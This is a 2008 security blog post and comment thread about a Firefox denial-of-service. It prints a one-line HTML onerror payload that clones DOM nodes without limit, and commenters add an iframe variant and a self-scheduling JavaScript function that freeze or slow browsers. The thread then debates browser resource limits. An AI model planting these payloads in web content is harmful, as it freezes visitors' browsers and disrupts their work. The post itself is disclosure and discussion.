DOM DOS Firefox
Wednesday, 9 January 2008
Check this DOS in Firefox:-
<img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))">
There are many DOM related Firefox problems, this was one of the more interesting ones I found 🙂
The entry 'DOM DOS Firefox' was posted
on January 9th, 2008 at 9:56 pm
and last modified on August 27th, 2009 at 2:50 pm, and is filed under dos, Firefox, Security.
You can follow any responses to this entry through the RSS 2.0 feed.
Both comments and pings are currently closed.
No. 1 — January 9th, 2008 at 10:24 pm
Why is this a problem exactly? There are lots of ways to trivially create exponential-growth algorithms in JS; this is just one example.
Put another way, malicious JS-based DOS is not exactly something that’s news. It’s easy. Browsers aren’t even trying to really prevent it.
No. 2 — January 9th, 2008 at 11:15 pm
Browsers should be.
No. 3 — January 9th, 2008 at 11:23 pm
Gareth, how do you tell a malicious page from a resource-hog “rich internet application” like google spreadsheets? They behave nearly identically.
If you have a magiv author-mind-reading device, I’d love to buy one from you.
No. 4 — January 9th, 2008 at 11:23 pm
That should have been “magic”, not “magiv”.
No. 5 — January 10th, 2008 at 12:05 am
confirmed here: FF 2.0.0.11
complete freeze and CPU = 100% in 5 seconds.
No. 6 — January 10th, 2008 at 2:05 am
@Boris
You are talking rubbish, I like to hack things and you shouldn’t be able to make the browser crash when visiting a web page. If you don’t like what I write then please visit Fox news instead, they should provide you with the “news” you’re looking for.
Now please go and troll somewhere else.
No. 7 — January 10th, 2008 at 7:55 am
I Agree with Gareth here. At least opera doesn’t keep eating memory. Both FF 2 and FF3 beta have this problem.
No. 8 — January 10th, 2008 at 7:57 am
Gareth, I’m not sure why disagreement with you is automatically classified as trolling.
“you shouldn’t be able to make the browser crash when visiting a web page” would be nice, but in practice it’s easy to cause runaway resource usage in all sorts of different ways. And telling apart runaway resource usage from a resource-intensive webapp involves reading the script author’s mind, in general.
Now perhaps browsers should be able to impose CPU/memory quotas on sites. That’s being thought about, but it’s not so easy to retrofit onto an existing browser; you really want to design with that in mind. Sadly, no one did.
No. 9 — January 10th, 2008 at 9:18 am
@Boris
I like having sensible discussions but comparing ajax applications to the code sample is silly. Browsers should protect against this stuff! Opera for example has a much better security model than Firefox.
No. 10 — January 10th, 2008 at 9:57 am
Gareth: are you using Opera? or something else
No. 11 — January 10th, 2008 at 10:26 am
Firefox is my weapon of choice mainly because of plugins. Opera is a better browser though
No. 12 — January 10th, 2008 at 4:12 pm
I tried this variant:
<iframe src=”” onload=”appendChild(cloneNode(appendChild(cloneNode(1))))”>
And it used full CPU on FF2, Opera, and FF3 beta, though Opera remained fairly responsive so I could close the tab. FF2 froze quickly. FF3 was unresponsive but did not freeze after about 15 seconds so I could still close the tab, though it took several seconds to actually close it.
Firefox does give you a prompt for scripts that take longer than usual to execute (like applying DHTML affects by DOM on a huge page), but this DOS is something of a different nature.
(and SpamBam doesn’t seem to like FF3 😉
No. 13 — January 10th, 2008 at 4:22 pm
Thanks for the info Zach, I’ll fix Spambam when I get a minute cheers
No. 14 — January 10th, 2008 at 6:40 pm
Gareth, Zach’s testcase is a good example of what I was saying: there are many many ways to cause exponential growth. Try this one:
function f() {
document.body.appendChild(document.createElement(‘div’));
setTimeout(f, 0);
setTimeout(f, 0);
}
f();
And I’ve seen ajax applications that had more or less this exact code, cutting off the recursion after some point. The problem is telling on the browser side whether they plan to do that or not (if wanting to only block malicious pages). Of course imposing resource limits in general would work, but it would also limit the scope of what webapps can do. That might be a good thing, of course.
No. 15 — January 10th, 2008 at 7:23 pm
Yep another good example, browsers should protect against this stuff. Firefox already does to some extent but obviously it needs to improve.